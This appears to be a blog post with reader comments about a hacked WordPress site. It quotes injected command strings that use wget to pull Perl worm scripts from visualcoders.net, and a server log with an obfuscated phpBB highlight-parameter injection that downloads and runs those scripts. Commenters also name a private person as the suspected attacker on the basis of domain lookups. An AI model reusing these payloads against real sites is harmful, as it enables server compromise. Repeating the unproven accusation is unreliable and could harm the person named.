Huh? Did someone hack my site? I loaded the page and got no CSS, so checked the template to find that the link to the CSS file had been replaced by this (I added line breaks, this was really all one long line):
http://huminf.uib.no/~jill/wp-login.php?
action=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;
wget%20www.visualcoders.net/spybot.txt;
wget%20www.visualcoders.net/worm1.txt;
wget%20www.visualcoders.net/php.txt;
wget%20www.visualcoders.net/ownz.txt;
wget%20www.visualcoders.net/wp-layout.css
My template was fine, so I looked at the options, and sure enough, my “site URL”, which WordPress glues into the template for almost every link it makes and which is supposed to be simply this: “http://huminf.uib.no/~jill/”, had been changed to all the following:
http://huminf.uib.no/~jill/wp-login.php?
action=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;
wget%20www.visualcoders.net/spybot.txt;
wget%20www.visualcoders.net/worm1.txt;
wget%20www.visualcoders.net/php.txt;
wget%20www.visualcoders.net/ownz.txt;
wget%20www.visualcoders.net
That looks very uncool. Now even to a total amateur at PHP like me, that seems to read as though every time someone looks at my blog, instead of the site fetching a CSS file that makes the page look pretty, an action is invoked that “gets” (“wget”, yeah?) a whole pile of nasty files called things like spy.gif and worm1.txt.
Does anyone understand this? What are they actually trying to do? Would this affect readers or my site? Would I have seen all sorts of stupid messages about how “spykids ownz your browser” if I’d been using Windows and Microsoft Explorer isntead of Firefox on a Mac? And how the heck did they change my site URL?
I fixed it, but I should obviously do something about security, huh? Except it’s Christmas! I don’t have time for this!!!
[I’ve asked for help at the WordPress support forum as well, and I filed a complain against visualcoders.net with Google, who run adwords through them. And I emailed the person who registered the domain, Mimoun Raddahi, who lives in Antwerpen, Belgium. Is there any chance visualcoders.net isn’t to blame here?]
L33tdawg
The attack you speak of is actually quite well known — if you look at the contents of the text files you’ll see that they’re basically PERL scripts designed to compromise anyone who unsuspectingly clicks on the link and is vulnerable (IE users only). That being said, if you examine the ownz.txt file you’ll see that this ‘kit’ has been assembled by the rather well known group ‘Spykids’ (http://www.zone-h.org/en/defacements/filter/filter_defacer=spykids). It looks like you either have a member of Spykids trying to ‘own’ your site or a script kiddie who happens to have the spykid ‘kit’ so to speak. You might want to see if there are any vulns for your version of WordPress.
Good luck.
Cheers,
LD.
Elin
Something odd is happening at my site too – my index file is being replaced now and then. It has been happening for some months – but I don’t have time to look at it. Argh.
AWolf
wget is a network utility to retrieve files from the Web using http and ftp and it runs from the command line in *nix operating systems. It is very useful for mirroring sites and if you aren’t careful, it might try to download the entire internet onto your server (a mistake I made several years ago when I was moving my websites to a new service provider). Also the “%20” is a blank space in html. My original guess was that visualcoders.net was the intended victim of your site being hacked. That is just a guess.
Tom Bartling
One of my websites also got hit, although I haven’t found any negative effects. They tried to access a page that’s looking for an ID number, but they replaced the ID with the same info that you posted.
I did a little research.
The hit came from IP address 213.193.231.130.
213.193.231.130 is owned by Tom Myny at Linux Systems.
The script pointed to visualcoders.net.
Tracking the IP for visualcoders.net using traceroute (or tracert on Windows) finds visualcoders.net is located at 213.193.231.130.
visualcoders.net is owned by Mimoun Raddahi.
The original email address for Mimoun Raddahi is mimoun@pandora.be
pandora.be is a domain that is owned by Telenet.
I suspect that Mimoun Raddahi is the hacker. I sent an email to Tom Myny at Linux Systems (the hosting company for visualcoders.net), and I copied the Technical Contact at Telenet.
Hopefully, this will resolve the hacking problem.
On a side note, this happened to me on Dec. 26th. While doing research, I Googled “Mimoum Raddahi” and found this website, one day after your posting. Man, google is fast.
Tom Myny
Hi All,
A script was running on our servers (wget%20www.visualcoders.net/spybot.txt;
wget%20www.visualcoders.net/worm1.txt;) because one of the customers phpbb sites was hacked. (viewforum.php bug)
I removed the buggy php file and stopped the processes.
visualcoders.net is not hosted by us (never was …)
perl php.txt SERVER_SIGNATURE=
Apache/1.3.31 Server at http://www.tegenwind.be Port 80? UNIQUE_ID=Qc5aCdXB54IAABRQNuQ HTTP_USER_AGENT=lwp-trivial/1.35 SERVER_PORT=80 HTTP_HOST=www.tegenwind.be SCRIPT_FILENAME=forum/viewtopic.php REQUEST_URI=/forum/viewtopic.php?t=97&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(122)%252echr(111)%252echr(110)%252echr(101)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527 SCRIPT_NAME=/forum/viewtopic.php REMOTE_HOST=sun2.netwerkshop.nl REMOTE_PORT=56449 PATH=/bin:/usr/bin PWD=/tmp SERVER_ADMIN=webmaster@linuxsystems.be REDIRECT_STATUS=200 PATH_TRANSLATED=forum/viewtopic.php REMOTE_ADDR=194.109.209.106 SHLVL=1 SERVER_NAME=www.tegenwind.be
Best Regards,
Tom
Messenger
HOLA
Lars
Indeed the 1st Google return for Mimoun Raddahi is this thread..!!!
Our stats file showed a 5x leap in page views on xmas day and from looking at the log files I found pretty much the same string described above.. hitting us every couple of seconds and coming from multiple IP addys.
Then I noticed a repetative request string using LWP:
http://www.google.com/search?hl=en&q=LWP&btnG=Google+Search
which looks like a data scrape script. I reported the flood
to Go Daddy but wouldn’t ya know it; visualcoders.net is now
hosted (already) somewhere else.
At least we haven’t had any problems with re-write of our files
but this kind of action def. borders on the crimminal, imho 8-(
Jill
Wow, thanks guys, for the speedy work! Google works really fast, yes…
There’s a lot more about this kind of attack on WordPress blog in the WordPress support forums – it’s done simply by typing commands into the URL. The vulnerability is fixed in the latest version of WordPress, or you can delete a few lines from one of the files in earlier versions to protect your system. Discussions are here and here.
Scary, huh?
k
welcome to the internet.
Bryan-Mitchell Young
Apparently, it is a new worm going around that attacks PHP sites, including wordpress.